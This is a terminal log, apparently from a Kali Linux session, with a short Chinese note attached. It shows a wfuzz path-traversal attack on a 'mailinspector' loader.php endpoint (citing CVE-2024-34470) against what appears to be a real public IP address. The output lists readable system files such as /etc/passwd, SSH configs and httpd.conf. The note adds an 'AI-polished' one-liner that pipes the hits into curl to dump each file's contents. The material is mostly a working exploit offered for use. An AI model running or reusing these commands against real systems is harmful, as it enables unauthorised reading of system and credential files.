┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://187.63.160.15/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000031: 200 1 L 2 W 28 Ch "/etc/ld.so.conf"
000000017: 200 9 L 54 W 687 Ch "/etc/fstab"
000000016: 200 13 L 53 W 404 Ch "/etc/crontab"
000000029: 200 131 L 446 W 3523 Ch "/etc/init.d/httpd"
000000030: 200 476 L 1763 W 14066 Ch "/etc/init.d/mysql"
000000038: 200 36 L 48 W 1645 Ch "/etc/passwd"
000000053: 200 2 L 4 W 48 Ch "/etc/resolv.conf"
000000057: 200 52 L 262 W 1836 Ch "/etc/ssh/ssh_config"
000000058: 200 52 L 262 W 1836 Ch "/etc/ssh/ssh_config"
000000020: 200 24 L 88 W 560 Ch "/etc/httpd/conf.d/php.conf"
000000072: 200 3 L 3 W 67 Ch "/etc/sysconfig/network"
000000071: 200 3 L 3 W 67 Ch "/etc/sysconfig/network"
000000069: 200 1 L 2 W 382 Ch "/etc/ssh/ssh_host_rsa_key.pub"
000000066: 200 1 L 3 W 627 Ch "/etc/ssh/ssh_host_key.pub"
000000070: 200 1 L 2 W 382 Ch "/etc/ssh/ssh_host_rsa_key.pub"
000000065: 200 1 L 3 W 627 Ch "/etc/ssh/ssh_host_key.pub"
000000062: 200 1 L 2 W 590 Ch "/etc/ssh/ssh_host_dsa_key.pub"
000000039: 200 182 L 491 W 4608 Ch "/etc/php.ini"
000000061: 200 1 L 2 W 590 Ch "/etc/ssh/ssh_host_dsa_key.pub"
000000021: 200 991 L 4834 W 33726 Ch "/etc/httpd/conf/httpd.conf"
000000143: 200 8 L 6 W 306 Ch "/usr/local/Zend/etc/php.ini"
Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0
參考CVE-2024-34470
補充:AI潤色版命令
wfuzz -u http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0 | grep '"/' | awk '!/0 L/' | cut -d '"' -f 2 | xargs -I {} sh -c 'echo {},"<--------"; curl -s http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..{}'